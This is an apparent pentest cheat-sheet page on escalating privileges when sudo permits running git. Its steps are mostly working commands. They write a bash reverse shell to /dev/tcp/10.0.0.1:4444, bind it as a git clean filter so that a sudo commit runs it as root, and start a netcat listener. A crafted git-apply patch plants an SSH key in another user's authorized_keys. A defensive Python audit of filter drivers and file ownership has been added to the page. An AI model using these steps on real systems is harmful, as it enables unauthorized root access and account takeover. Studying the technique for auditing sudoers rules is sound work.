Sudo Git Privilege Escalation

Allowing a user to run git through sudo can lead to privilege escalation.


Last updated 1 year ago

Git Add/Commit

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"

If we can commit to the Git repository as root, we may be able to escalate privileges.

Exploitation

  1. Create a Payload

echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell

  2. Set Git Config

# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell

  3. Commit the Repository

Before committing, we need to start a listener on the local machine.

nc -lvnp 4444

Then commit with sudo.

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"

Now we should get a shell in the local terminal.
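
A defender's check for the condition this technique depends on, as an added example that is not part of the original page: before a sudoers rule lets users run git against a repository, list the filter drivers its config defines, the attribute lines that bind them, and any of those files not owned by root. The function names and the simplified parser (no quoted values or includes, only the repository's own config and info/attributes) are assumptions of this example.

```python
import re
from pathlib import Path

# Constructed samples mirroring what the steps above leave under .git/
SAMPLE_CONFIG = '[core]\n\tbare = false\n[filter "indent"]\n\tclean = /tmp/revshell\n'
SAMPLE_ATTRS = "# constructed sample\n*.php filter=indent\n"

SECTION = re.compile(r'^\[\s*([\w.-]+)(?:\s+"([^"]*)")?\s*\]')
COMMAND_KEYS = {"clean", "smudge", "process"}  # filter.<driver>.* values git executes


def filter_commands(config_text):
    """Return {driver: {key: command}} for filter drivers in git config text."""
    drivers, section, sub = {}, None, None
    for line in map(str.strip, config_text.splitlines()):
        if not line or line[0] in "#;":
            continue
        header = SECTION.match(line)
        if header:
            section, sub = header.group(1).lower(), header.group(2)
            continue
        key, _, value = (part.strip() for part in line.partition("="))
        if section == "filter" and sub and key.lower() in COMMAND_KEYS:
            drivers.setdefault(sub, {})[key.lower()] = value
    return drivers


def bound_filters(attributes_text):
    """Return {pattern: driver} for each 'filter=<driver>' attribute."""
    bound = {}
    for fields in map(str.split, attributes_text.splitlines()):
        if fields and not fields[0].startswith("#"):
            for attr in fields[1:]:
                if attr.startswith("filter="):
                    bound[fields[0]] = attr.split("=", 1)[1]
    return bound


def audit(git_dir):
    """Findings for a repository that a sudoers rule lets users run git on."""
    cfg, attrs = Path(git_dir, "config"), Path(git_dir, "info", "attributes")
    drivers = filter_commands(cfg.read_text()) if cfg.is_file() else {}
    findings = [f"filter.{d}.{k} runs: {c}" for d, ks in drivers.items() for k, c in ks.items()]
    bound = bound_filters(attrs.read_text()) if attrs.is_file() else {}
    findings += [f"{pat} is bound to filter '{d}'" for pat, d in bound.items()]
    for p in (Path(git_dir), cfg, attrs):  # root-run git should not read user-owned files
        if p.exists() and p.stat().st_uid != 0:
            findings.append(f"{p} is owned by uid {p.stat().st_uid}, not root")
    return findings
```

Calling audit("/opt/example/.git") on the repository from this page returns a list of findings; an empty list means no filter driver is defined there and the checked files are root-owned.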

Git Apply

sudo /usr/bin/git apply *

If we can apply a patch to the Git repository, we can update the content of an arbitrary file.

Exploitation with SSH Keys

Assume we are currently the user "user1" and want to escalate to "user2". First, we create a new SSH key.

cd /home/user1
ssh-keygen -t rsa
Enter file in which to save the key (/home/user1/.ssh/id_rsa): id_rsa

New SSH keys (private/public) are generated under /home/user1. Next, add the content of id_rsa.pub to authorized_keys.

cat /home/user1/id_rsa.pub > /home/user1/.ssh/authorized_keys

Then create a patch.

cd /home
git diff user1/.bash_history user1/.ssh/authorized_keys > /tmp/patch

After that, replace the name “user1” with “user2” in the patch file.

sed -i 's/user1/user2/g' /tmp/patch

Now we can apply the patch as root. This command updates the target user's ("user2") authorized_keys so that we can log in with the SSH key as "user2".

sudo /usr/bin/git apply /tmp/patch
ssh -i /home/user1/id_rsa user2@example.com
